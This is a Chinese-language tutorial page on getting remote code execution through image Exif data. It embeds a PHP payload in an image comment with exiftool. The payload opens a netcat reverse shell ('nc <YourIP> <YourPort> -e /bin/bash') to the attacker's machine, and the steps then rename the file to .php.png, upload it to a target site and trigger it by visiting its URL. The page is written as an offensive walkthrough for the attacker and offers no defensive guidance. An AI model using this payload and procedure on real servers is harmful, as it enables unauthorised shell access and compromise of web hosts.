zl程序教程

您现在的位置是:首页 >  Python

当前栏目

通过 Exif 数据远程执行代码

2023-04-18 14:57:04 时间

Exif 代表可交换图像文件格式。Exif 数据在您单击的照片中存储敏感信息,例如地理位置、日期、相机名称、修改日期、时间、传感方法、文件源、压缩类型等。现在,这些数据存在于您使用相机拍摄的每张照片中。

如果服务器没有剥离 EXIF 数据,攻击者可以使用该技术获得远程代码执行。

如何找到这个漏洞?

  1. 转到您的目标网站并检查 Exif 数据漏洞
  2. 现在拍摄图像并使用exiftool在其中插入有效载荷

payload:

exiftool -Comment='<?php system(“nc <YourIP> <YourPort> -e /bin/bash”); ?>' 文件名.png

插入有效载荷

3.现在为了执行这个文件,我们需要修改扩展名,因为.png不是可执行格式,所以使用这个命令修改文件扩展名

命令 (linux) :

mv filename.png filename.php.png

修改文件

4. 现在将文件上传到您的目标网站

上传文件

文件上传

5. 在你的机器上启动 Netcat 监听器

6. 现在访问上传文件URL

https://ip/profile/filename.php.png